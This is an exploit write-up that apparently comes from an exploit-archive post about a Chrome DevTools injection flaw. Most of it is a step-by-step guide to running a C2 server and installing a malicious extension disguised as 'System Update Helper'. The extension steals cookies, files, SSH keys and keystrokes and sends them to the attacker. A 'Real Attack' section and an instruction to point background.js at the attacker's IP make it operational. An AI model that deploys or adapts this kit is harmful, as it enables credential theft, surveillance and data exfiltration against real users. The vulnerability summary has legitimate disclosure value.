=============================================================================================================================================
| # Title     : Google Chrome 145.0.7632.117 High-Severity DevTools Injection Vulnerability                                                 |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://www.google.com                                                                                                      |
=============================================================================================================================================

[+] Summary    :  A high-severity vulnerability was identified in the DevTools component of Google Chrome versions prior to 145.0.7632.117. 
                  The issue stems from an inappropriate implementation that allowed insufficient isolation between Chrome extensions and privileged DevTools pages.
                  If a user was convinced to install a malicious browser extension, the extension could exploit this flaw to inject arbitrary scripts or HTML into a privileged DevTools page. 
				  This could potentially lead to exposure of sensitive information accessible within that privileged context.
                  The vulnerability does not allow remote exploitation without user interaction and does not directly result in sandbox escape or operating system compromise. 
				  However, due to the privileged nature of DevTools pages, the impact was rated High by the Google security team.

[+] POC   :  

How does this scenario work? ===> https://youtu.be/oFLvPWdp4X4

The malicious extension is installed.

The extension starts a phishing.html page and prompts the user to open DevTools, claiming an error message.

When DevTools is opened, the malicious code (payload) is executed within the page context, allowing data theft or communication with the host.

Ideas

Add-on permissions: For these codes to work, the add-on must request permissions such as "tabs", "devtools", and "<all_urls>" in the Manifest.json file.

[+] Step 1: Server Setup (Attacker Side)

1.1 Install Requirements  : pip install flask flask-cors

1.2 Run the Server

download : https://github.com/indoushka/chromium/ =====> cd chromium ========> python sever-C2.py

Expected Output:

C2 Server running on http://0.0.0.0:8080

Dashboard: http://localhost:8080/dashboard

[+] Step 2: Extension Installation (Victim Side)

2.1 Prepare Extension Files

Place all files in a single folder (e.g., chromium/extension/).

2.2 Install the Extension in Chrome

    Open chrome://extensions.

    Enable Developer mode (toggle in the top right).

    Click Load unpacked.

    Select the folder containing the extension files.
	
    Installation Confirmation: The extension should appear in the list named "System Update Helper".

[+] Step 3: How the Exploit Works

3.1 Automatic Data Collection (No Victim Interaction)

Once the extension is installed, it automatically begins:

Function	                 Timing	                         Result
Cookie Theft	        Upon installation	          Cookies are sent to the server
Extension Discovery	    Upon installation	          List of installed extensions is sent
Page Tracking	        During browsing	              Every page the victim visits is logged
Heartbeat	              Every minute                Confirms the extension is still active

3.2 Exploiting Privileged Pages (Requires Victim Interaction)

When the victim opens a privileged page such as chrome://settings or chrome://downloads:

    A red message appears requesting the user to open DevTools:
    Page Error - Press F12 to open Developer Tools and fix the issue

    If the victim presses F12, the exploit code executes.

    Automatic file theft begins:

        C:/Windows/System32/drivers/etc/hosts

        C:/Users/Public/Documents/passwords.txt

        SSH files and system keys.

3.3 Keylogging

When the victim types in any password field:
Plaintext

Keylogger installed

Key logged: a
Key logged: b...

Every keystroke is sent to the server immediately.

[+] Step 4: Monitoring Stolen Data (Attacker Side)

4.1 Open the Control Panel

In the browser, open: http://localhost:8080/dashboard

4.2 Reading the Data

Section	What you see

Pages	    All pages visited by the victim
Cookies	    Stolen cookies (including tokens)
Files	    Files stolen from the victim's device
Keys	    Keystrokes (passwords)
Extensions	Other installed extensions

4.3 Saved Files

    collected.json: All data in JSON format.

    stored_*.txt: Stolen files.

    keystrokes.log: Keystroke log.

    passwords.txt: Extracted passwords.

[+] Practical Usage Scenarios

Scenario 1: Testing on a Single Device

[Your Device] ← Acts as both attacker and victim

    Run the server: python sever-C2.py

    Install the extension on the same device.

    Open the dashboard: http://localhost:8080

    Browse normal sites and chrome://pages.

[+] Scenario 2: Real Attack (Two Devices)

Victim Device	                   Attacker Device
Installs the extension	          Runs the server on a real IP
Opens chrome://settings	          IP: 192.168.1.100:8080
Presses F12	                      Opens the dashboard
Files are stolen	              Sees data instantly

Minor Adjustment: Change the C2 address in background.js to the attacker's IP : const C2 = 'http://192.168.1.100:8080';  // The attacker's real IP

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================